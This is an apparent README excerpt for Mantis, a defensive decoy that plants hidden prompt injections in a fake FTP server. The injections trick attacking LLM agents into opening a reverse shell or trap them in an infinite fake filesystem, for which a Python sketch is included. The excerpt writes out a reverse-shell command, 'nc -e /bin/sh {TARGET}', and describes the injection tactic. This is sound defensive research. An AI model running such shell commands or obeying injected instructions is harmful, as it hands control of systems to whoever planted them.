An example of a Mantis configuration file is given in ./confs/ftp_hackback_rshell.py. What this configuration means and how to choose your own are explained later in this README file. The configuration can be run using the mantis_run.py script:
Running Mantis with confs/ftp_hackback_rshell.py will spawn an FTP decoy server with anonymous credentials that aims to trick the attacking LLM-agent into opening a reverse shell via (invisible) prompt injections. When triggered, it spawns a reverse shell listener on the specified port for testing (⚠️ this configuration is not intended for production ⚠️).
In these examples, we use a very simple reverse shell initiator: nc -e /bin/sh {TARGET} .... This can be changed by altering the variable REVERSE_SHELL_INITIATOR in the configuration file (e.g., confs/ftp_hackback_rshell.py), where the parameter {TARGET} is the IP of the host (which is set automatically by Mantis). If you want to automate the attacker's post-exploitation, you can modify or replace the class Mantis.Decoys.reverse_shell_listener.ReverseShellListenerTest. How the configuration files work is covered later in this README.
This starts a fake FTP server with an infinitely deep filesystem and tailored (invisible) prompt injections to keep the attacking LLM agent trapped. The complexity of the tarpit can be set via the EXPECTED_NUMBER_OF_DIRECTORIES variable in ./confs/ftp_filesystem_tarpit.py.
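How a decoy can present an infinitely deep filesystem without storing one, as an added sketch that is not Mantis's own code: each listing is derived from a hash of the requested path, so any path exists and repeated listings stay consistent. The names list_dir, descend, expected_dirs and secret are hypothetical; expected_dirs is assumed here to be the mean number of subdirectories per listing, which is not necessarily how Mantis interprets EXPECTED_NUMBER_OF_DIRECTORIES.

```python
import hashlib
import random

# Constructed word list used to build plausible directory names.
WORDS = ["backup", "conf", "data", "keys", "logs", "private", "src", "users"]


def _rng(path: str, secret: bytes) -> random.Random:
    """Seed a PRNG from the path so a listing is stable without storing it."""
    digest = hashlib.sha256(secret + b"\0" + path.encode()).digest()
    return random.Random(int.from_bytes(digest[:8], "big"))


def normalize(path: str) -> str:
    """Collapse '.', '..' and duplicate slashes into a canonical absolute path."""
    parts = []
    for part in path.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if parts:
                parts.pop()
        else:
            parts.append(part)
    return "/" + "/".join(parts)


def list_dir(path: str, expected_dirs: int = 4, secret: bytes = b"demo") -> list[str]:
    """Return the subdirectory names of any path; every path 'exists'."""
    rng = _rng(normalize(path), secret)
    # Between 1 and 2*expected_dirs - 1 entries: the mean is expected_dirs
    # (assumed meaning of the knob) and no directory is ever a dead end.
    count = rng.randint(1, 2 * expected_dirs - 1)
    names = set()
    while len(names) < count:
        names.add(f"{rng.choice(WORDS)}_{rng.randrange(1000):03d}")
    return sorted(names)


def descend(depth: int, **kw) -> str:
    """Follow the first entry of each listing `depth` times; never runs out."""
    path = "/"
    for _ in range(depth):
        path = normalize(path + "/" + list_dir(path, **kw)[0])
    return path
```

Because listings are computed on demand, memory use stays constant however deep a client walks, and a per-deployment secret keeps the tree from being predictable across decoys.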